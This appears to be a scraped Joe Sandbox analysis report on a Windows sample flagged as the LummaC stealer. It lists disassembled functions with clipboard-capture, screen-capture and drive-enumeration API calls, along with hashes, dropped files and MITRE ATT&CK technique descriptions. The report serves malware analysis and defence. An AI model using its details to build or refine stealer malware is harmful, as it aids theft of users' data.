Instruction Fuzzy Hash: 50C04C69E6C4008B924CCB15AC5153266769B8B254715E03A841663255E234945B950D

Function 0212D59B Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2120000_89AC.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
Instruction ID: 7f7bc6cad9a6dec16f8ead4233ac0c35b5e2bdc1b737bc655ee263a2a3041e91
Opcode Fuzzy Hash: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
Instruction Fuzzy Hash: 16C04C69A6C4008A924CCB15FC5053162769B8B254715E029802A53255E224946BC94D

Function 021621EA Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2120000_89AC.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35d2e33cd3e1e12ea04a62caa481261f2aa62d3dab37d938482d2be42403fd6b
Instruction ID: d46756a0e1fb04911aea311e00f3b6d6bbb29cfd6f8012ad29779e734c60ec08
Opcode Fuzzy Hash: 35d2e33cd3e1e12ea04a62caa481261f2aa62d3dab37d938482d2be42403fd6b
Instruction Fuzzy Hash: D7B002749493418BD380CF18D545726F6F0B747615F142919A054F3151D374D9488A5E

Function 02161C3E Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2120000_89AC.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b31a4ec24c9909080489b0d4d2d3b4d03d345a3c8726ed2263eab24f62679d5
Instruction ID: c018d795f0dc3322a67de82126959776e6cc80093cc23c5047751edba26d1c35
Opcode Fuzzy Hash: 3b31a4ec24c9909080489b0d4d2d3b4d03d345a3c8726ed2263eab24f62679d5
Instruction Fuzzy Hash: BC900224D49100CA81408F45A480570E278630B10DF1534109008F3011C210D404450C

Function 004367F0 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 109clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00436804
GetClipboardData.USER32 ref: 0043681F
GlobalLock.KERNEL32 ref: 00436838
GetWindowLongW.USER32 ref: 0043689D
GlobalUnlock.KERNEL32 ref: 00436959
CloseClipboard.USER32 ref: 00436962

Strings

C, xrefs: 004368B8
}, xrefs: 004368D1
t, xrefs: 004368D6
K, xrefs: 004368E5
B, xrefs: 004368C7
F, xrefs: 004368E0
N, xrefs: 004368C2
E, xrefs: 004368B3
{, xrefs: 004368BD
@, xrefs: 004368EA
O, xrefs: 004368CC

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: @$B$C$E$F$K$N$O$t${$}
API String ID: 2832541153-984153585
Opcode ID: bcc03291c71dc1ac25c6e95f0924d253445351a4da78695e986e918d99809bc9
Instruction ID: d12379fae56aa42f0d26b1a9ba346e1c7749dd96ee15ae9ce42ccc61be201c2c
Opcode Fuzzy Hash: bcc03291c71dc1ac25c6e95f0924d253445351a4da78695e986e918d99809bc9
Instruction Fuzzy Hash: 65418FB050C3818ED301EF78D58931FBFE0AF96318F05492EE4C996292D67D8549CBAB

Function 02156A57 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 109clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 02156A6B
GetClipboardData.USER32 ref: 02156A86
GlobalLock.KERNEL32 ref: 02156A9F
GetWindowLongW.USER32 ref: 02156B04
GlobalUnlock.KERNEL32 ref: 02156BC0
CloseClipboard.USER32 ref: 02156BC9

Strings

t, xrefs: 02156B3D
N, xrefs: 02156B29
@, xrefs: 02156B51
F, xrefs: 02156B47
B, xrefs: 02156B2E
C, xrefs: 02156B1F
E, xrefs: 02156B1A
K, xrefs: 02156B4C
}, xrefs: 02156B38
O, xrefs: 02156B33
{, xrefs: 02156B24

Memory Dump Source

Source File: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2120000_89AC.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: @$B$C$E$F$K$N$O$t${$}
API String ID: 2832541153-984153585
Opcode ID: 8fd00541a03fdab39137d35ec259fb7aeeef9dd7c60101cc427a738eb574f5a5
Instruction ID: dfee15bd165c8367f494455c47dd1b3ccee5bc050d91689aa3fe94cb068c4bb1
Opcode Fuzzy Hash: 8fd00541a03fdab39137d35ec259fb7aeeef9dd7c60101cc427a738eb574f5a5
Instruction Fuzzy Hash: 8041597050C7918EE310AF78948831FBFE5AB82318F05096DE8D986292D7B98548CBA7

Function 021455CF Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 106COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 0214572D

Strings

C`<f, xrefs: 0214563A
.T'j, xrefs: 02145622
,X*^, xrefs: 0214560A
?P:V, xrefs: 0214561A
1D6Z, xrefs: 02145602
:@&F, xrefs: 021455FA
%\)R, xrefs: 02145612

Memory Dump Source

Source File: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2120000_89AC.jbxd

Yara matches

Similarity

API ID: DrivesLogical
String ID: %\)R$,X*^$.T'j$1D6Z$:@&F$?P:V$C`<f
API String ID: 999431828-351939610
Opcode ID: 4f62df2b81f42cfb46ec157f180c00cd4febe93a651d1f2f065370f133753792
Instruction ID: 1ae72fe150ee76d8bcb1bb92b39ff7969037119aa93886cb28c7e790bfa4989b
Opcode Fuzzy Hash: 4f62df2b81f42cfb46ec157f180c00cd4febe93a651d1f2f065370f133753792
Instruction Fuzzy Hash: D631EBB41493449FC710CF29C96122BBBF2FFC1364F45981CE59A4B720EB799946CB42

Function 02156BE7 Relevance: 12.1, APIs: 8, Instructions: 67windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 02156BF0
GetCurrentObject.GDI32(00000000,00000007), ref: 02156C11
GetObjectW.GDI32(00000000,00000018,?), ref: 02156C21
DeleteObject.GDI32(00000000), ref: 02156C28
CreateCompatibleDC.GDI32(00000000), ref: 02156C37
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02156C42
SelectObject.GDI32(00000000,00000000), ref: 02156C4E
BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 02156C71

Memory Dump Source

Source File: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2120000_89AC.jbxd

Yara matches

Similarity

API ID: Object$CompatibleCreate$BitmapCurrentDeleteSelect
String ID:
API String ID: 2843486406-0
Opcode ID: 637d2dcd770b1b81d6daddeec98349090a5cabd35a80d80db673790c1e385553
Instruction ID: 86cf267800b11791fa8191dc84d7a06dc736fe1f5a7d6b6dcf18e833688584b8
Opcode Fuzzy Hash: 637d2dcd770b1b81d6daddeec98349090a5cabd35a80d80db673790c1e385553
Instruction Fuzzy Hash: E6214FB9544310EFE3509F609C49B2B7BF8EB8AB11F014929FA59A2290D77498048B67

Function 02145367 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 02145411

Strings

+$e, xrefs: 021453E1, 021453CC
+$e, xrefs: 02145459
E#G, xrefs: 021453A1
XY, xrefs: 021453AD

Memory Dump Source

Source File: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2120000_89AC.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: +$e$+$e$XY$E#G
API String ID: 237503144-1023387988
Opcode ID: 796cc6ccac140472a8104463ef7e640a249bdffaa71f860e68154a69d4d8fa0c
Instruction ID: 3a97d18185b48022ea8d66f9eb7f569090f7684536c4d83b249cf50b053a44be
Opcode Fuzzy Hash: 796cc6ccac140472a8104463ef7e640a249bdffaa71f860e68154a69d4d8fa0c
Instruction Fuzzy Hash: 9021083424C344AFD3148F65D88175FBBE1EBC6714F25C92CE5A85B282DB75C80A8F86

Function 02145A47 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 117COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 02145B5B

Strings

B"@, xrefs: 02145A7F
rp, xrefs: 02145A9B
`J/H, xrefs: 02145A8D

Memory Dump Source

Source File: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2120000_89AC.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: B"@$`J/H$rp
API String ID: 237503144-3817236508
Opcode ID: d1879db7092e8caf361d2fa4e2e19fcb9f3d80e285b1dd23349b8ef0ea2aa233
Instruction ID: 2952940744ab8ec413ac4043475bcd5d04dcbd76d4ee0873e887cc61054ef802
Opcode Fuzzy Hash: d1879db7092e8caf361d2fa4e2e19fcb9f3d80e285b1dd23349b8ef0ea2aa233
Instruction Fuzzy Hash: 5531CDB0E443489FDB10CFA9D8827DEBBB2EF45700F50002CE441BB295DAB55906CFA9

Function 0042F0FD Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 160COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 0042F23F

Strings

ou, xrefs: 0042F23F
aN@, xrefs: 0042F2FC

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID: FreeLibrary
String ID: aN@$ou
API String ID: 3664257935-2181136730
Opcode ID: 6923c55db78119380e5fe35a3321c238481177c04641367e3fdf37507d6e1cbb
Instruction ID: fb7b49653fcfe6187a11668ca7033b53e8d7d933bb39412ee55706a61e0bd157
Opcode Fuzzy Hash: 6923c55db78119380e5fe35a3321c238481177c04641367e3fdf37507d6e1cbb
Instruction Fuzzy Hash: 5951777460C3C08BE3358B299C557ABBFE29FE2308F48096DE0D95B3D2DA74440AC75A

Function 0040BA80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00408A9E), ref: 0040BA86
FreeLibrary.KERNEL32 ref: 0040BAA7

Strings

ou, xrefs: 0040BA86, 0040BAA7

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID: FreeLibrary
String ID: ou
API String ID: 3664257935-3837949563
Opcode ID: 880272bc0811b14ab5181b2bf88990afbeca93da92f698920aa63cdcc06e2724
Instruction ID: 76f8199259777ce60f51c6d99c718f1815bb22ab62b72bec75753df54c08d8dc
Opcode Fuzzy Hash: 880272bc0811b14ab5181b2bf88990afbeca93da92f698920aa63cdcc06e2724
Instruction Fuzzy Hash: E2C0023B8620009BDE857FA0FD898187A31FB4A30531C44B4B80140036DAA20960AA59

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report NDWffRLk7z.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_89AC.tmp.exe_c7573049a43a868158876825174a764e1e992_b6b8f336_9eeada63-c3e8-4d4f-a274-b2eff002f940\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7578.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7683.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER76C2.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\ScreenUpdateSync[1].exe

C:\Users\user\AppData\Local\Temp\89AC.tmp.exe

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Windows Analysis Report
NDWffRLk7z.exe

Function 004016DF Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150
clipboardsleepmemoryCOMMON

Function 004029EA Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134
networkfilesynchronizationCOMMON

Function 0043D02C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 00432F19 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Function 0211003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Function 00402BFA Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 179
networkCOMMON

Function 004051C6 Relevance: 9.1, APIs: 6, Instructions: 82
COMMON

Function 004057F6 Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Function 00402956 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
COMMON

Function 0042DFB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
threadCOMMON

Function 0042E104 Relevance: 4.6, APIs: 3, Instructions: 54
threadCOMMONLIBRARYCODE

Function 00434745 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Function 00402BA3 Relevance: 4.5, APIs: 3, Instructions: 41
registryCOMMON

Function 0042E064 Relevance: 4.5, APIs: 3, Instructions: 31
threadCOMMON

Function 00402394 Relevance: 3.1, APIs: 2, Instructions: 125
windowCOMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre